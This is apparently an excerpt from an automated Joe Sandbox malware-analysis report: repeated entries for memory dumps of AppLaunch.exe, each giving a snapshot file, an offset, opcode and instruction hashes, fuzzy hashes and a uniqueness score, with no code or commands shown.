                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: c11c65e897d7186b766dd7b34e2144a08566581f5915400f752035d3412d0626
                                                                                                                                                                                                                                                                                                                  • Instruction ID: cfd2ac29490965e97acdc2ca162ebc9b66cee0888e3244dbabe1e56d5ce0541e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c11c65e897d7186b766dd7b34e2144a08566581f5915400f752035d3412d0626
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37416834A10605CFDB14CF69C48496AFBF2FF89320B15C569E89AABB51DB30EC51CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 62e24c78ac16bd4be6c691f96a62915371278e06901f78bff0ef1407899044a5
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 10a0191649c3bd9b812c488e926a44d3cbf33970796fd0e2435791774240e8af
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62e24c78ac16bd4be6c691f96a62915371278e06901f78bff0ef1407899044a5
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 024173302007009FE315EB75E861BAA7BF6EF86314F41DA6CD2464FA61DB71B9088B91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: efe300e1a191b65bdbaf56a48303e140b1dc7bbc8a5a492b873a802483bb5ec8
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 55a64ad759153439b6c593526be8bc8afd774392e3b78244a5faf4a40f3d11f4
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efe300e1a191b65bdbaf56a48303e140b1dc7bbc8a5a492b873a802483bb5ec8
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67415C38B40115CFCB04DF68C49896A7BF5FF89350B1984AAE945DB762DB30EC51CBA0
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaad81c90d347159bc1a17c171f48723283279e799ab3e0d6ac3ccd000315132
                                                                                                                                                                                                                                                                                                                  • Instruction ID: b946c10748c4519d706a363a2e944c1cf5761f8adeea0540e1137ad4470ef039
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaad81c90d347159bc1a17c171f48723283279e799ab3e0d6ac3ccd000315132
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B4164302007009FE315EB75E861BAA7BF6EF86314F45DA6CD2464BA51DF71B9088B91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 75f0faea34532c917a1134b1efd0ef13635df4ce370a2df780bf85003ff9983a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 17e5aecbda46ece315fcc5f2ee7ad47728001907721442ad6ce83e4928129150
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75f0faea34532c917a1134b1efd0ef13635df4ce370a2df780bf85003ff9983a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67417C35B003248FDB189B69D85869EBBF6AF88364F154079E906E7350EB399C41CBA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 03b0d0bb578630157213cad0bab36755bca6426c36ef3336d13f81fa087ab4b1
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e1af799d24e9712c3f54d33c018063f4d12d2a50f5ec590a6212d212fe4b8f39
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03b0d0bb578630157213cad0bab36755bca6426c36ef3336d13f81fa087ab4b1
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2541C030B44215DFEB14EBB9D8247AE7BB2BF85304F104469D501EB394DF789945CBA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: c018d3d39e1bd7c5f832fd86c962094fd26a12c40bdfe6e706a0ac03fd41345f
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3ce006d3855903342b687db0a35d7c5f8eee08ab47f3ec53dc20b17845bca64b
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c018d3d39e1bd7c5f832fd86c962094fd26a12c40bdfe6e706a0ac03fd41345f
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3415B35B002199FDB04DFA8D888AAEBBF6FF8C308F548468E515E7351DB35A851CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d7352fec89d4c3d44c08484e3712ceacd15920f413dbdf3eca1d0d1b1207fc4f
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a383ad3a7e873dfc3d67e4a4a8c3341e803530091169e4d975859565d503a34
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7352fec89d4c3d44c08484e3712ceacd15920f413dbdf3eca1d0d1b1207fc4f
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D416935B402549FCB05DF38D8949AABBB2FF8A300B148069E906DB751DB31DD01CBA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 750beb3bf9dc9d6568edca2354ce841fc8e5dd23e88404ed0862fc8167344db1
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2013504baaa9fcc2b2a51f466e30b4c113f94db2fa7f4de531db9cf58257634c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 750beb3bf9dc9d6568edca2354ce841fc8e5dd23e88404ed0862fc8167344db1
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0241A134700296DFC704DF78E5949AABB77FF852047044299D8069B2A6DB30ED91CBE1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ae823e0c498c3bbb0e2716bc0f70b48cb8fad6d697b6c24791ca989d31680e14
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7490da9ccd2871cc2771578001a5c8681ff1e1da22ec675752cd77bd19f32a65
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae823e0c498c3bbb0e2716bc0f70b48cb8fad6d697b6c24791ca989d31680e14
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B31C230B042508FDB15EBBC985566E3BF6EFCA354B1500AAE905DB362DE389C0587A1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 15b92a5b34cb029a18d2cb7cca896e520020c17049f91f5c7e86835b3aef493c
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ba045797b70c9e36430e91dd6ec860d7675050f8592d9cea2417e44e46008324
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15b92a5b34cb029a18d2cb7cca896e520020c17049f91f5c7e86835b3aef493c
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4418D70A002549FCB44DFA8D851AAEBBF5EF8D310B15C16AD909E7352DB30ED01CBA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 21e46f2d464dbe46ac482145e5777fbead89eaf3c5c96ede3332529d113e3e5e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: b223e5b5cb2096f74f97ba58e3f677fb5c6ba9ac702b2377cc0b4fc48dabb7b6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21e46f2d464dbe46ac482145e5777fbead89eaf3c5c96ede3332529d113e3e5e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 823138307093904FD316A735A82466E3FF69FCB21071484BED946CB791EE689C09C392
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f9d6d2b4caab63e36ff3dab9289d060abfd4520ab0769a90860f17baf291e524
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e3d9378e0060a75c0acd1e06c4ed996832acf1430ef77bf041e310cf1f420310
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9d6d2b4caab63e36ff3dab9289d060abfd4520ab0769a90860f17baf291e524
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D315934B002158FD758EF69C468B6E7BF2AF89354F240468E9069B3A0CF399C41CBA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: c4909957994fe9cfdea004e157f6054e5d5a17298fd9813790b09ffefd5fe6eb
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 79d2d0b21c49eb4e7da4b3d5070a889c4c0da12bcc8a873d32d54c14674452ce
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4909957994fe9cfdea004e157f6054e5d5a17298fd9813790b09ffefd5fe6eb
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D3139317043919FDB15AB38E82466A3FBAEF8721472544AAE502CB351DE3D5C09C791
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7573101288d90ad884749b7bd5628a3fbc09486a533231a3fbbd027b64547dde
                                                                                                                                                                                                                                                                                                                  • Instruction ID: a08db5e48c29b2e35f1268c41e8977a26e5f57c6a887201e8dfeaf61c553a1b0
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7573101288d90ad884749b7bd5628a3fbc09486a533231a3fbbd027b64547dde
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E3316A74A001149FCB44DFA9D851AAEBBF6EF8C310B15C16AD909E7311DB70ED02CB91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 42008bb19c78ed9242cafae12dadababf67707ab4998afe55bdbfae120576641
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 94e6cbaf134a11327cfaab812b956fd624440d52c892a4dc86f5db44d0f8d934
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42008bb19c78ed9242cafae12dadababf67707ab4998afe55bdbfae120576641
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A316D387047018FD714AF39D494A6ABBE6EF89354B15897DE942CB360DB74EC02CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9f9a69fb21834876b3cd4644d23378e0940045563af6cba8a95181c4eebf9ef8
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 39b5caca0d6a97e3855c222d21e883f6faa2ec1532b85f5eef758f8f2b5bc9b1
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f9a69fb21834876b3cd4644d23378e0940045563af6cba8a95181c4eebf9ef8
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63319F70B002178BFB64EF7A941436EBAB6AFC4251F148429D95ADB280DF30C851CBA6
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0f03aa075eb85988839c8fbb8bcaca57906afb4ba16590e6ca8916f0b3a5b060
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f2313a767fe305a76b7d9c264f2d65ecbcb4d553c15a00ff0dd0fb335ded7946
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f03aa075eb85988839c8fbb8bcaca57906afb4ba16590e6ca8916f0b3a5b060
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0414735900219EFEF01DFA4E849AACBFB2FF49304F144455E601A7221EB3A6955DF91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 768c6d92bf484ddc4bd0b36d07ac78a717648787364c18c3395a4fd8f6356ff9
                                                                                                                                                                                                                                                                                                                  • Instruction ID: b071af004f73efa72315ca6673b53fde79f1155c42158b7fe40417d47ccdfc82
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 768c6d92bf484ddc4bd0b36d07ac78a717648787364c18c3395a4fd8f6356ff9
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 913149387006119BD714AE29D894A6AB7E6EF88354B248939A946CB754EF70EC02CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ae072ff323d819d0d08c656f6035b68f04061afdf35a35414173e12ab5674c23
                                                                                                                                                                                                                                                                                                                  • Instruction ID: bdd2e7463bb8be1874a78803cf85998bc564b2b5bee15ec0394344706e70ed4f
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae072ff323d819d0d08c656f6035b68f04061afdf35a35414173e12ab5674c23
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F318A32D0074B8ADB11DFB9D810299B771BF99320F25862AE54977640EB30B6E0CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ac5ce492974b0573de9f9c36b116c1ba1ae22b956c45431a3607626fc8dfb5ed
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ba1b488641a6f2dce8889c2b63571314c4aadf8302a4f7ba9a502ef0a2c54da9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac5ce492974b0573de9f9c36b116c1ba1ae22b956c45431a3607626fc8dfb5ed
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E2162303803015BE718A736A87277E3667DFC2254F0AD92DD6068F794EE76AD0A8791
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f9e601d25c2f9d30759aaf3cf227a7d07d432086835267d5fbfa74a8d4a76a7e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ab8d72acb6317f2f347c64c5c50ae13e586f28783f7bd7953b3cbfb09067dfb9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9e601d25c2f9d30759aaf3cf227a7d07d432086835267d5fbfa74a8d4a76a7e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 502138307082409FC701DB69C9409BEBBF6EF8A314B19916AE605CB3A2DB35DC15C791
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2654013369.0000000009E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09E10000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9e10000_AppLaunch.jbxd
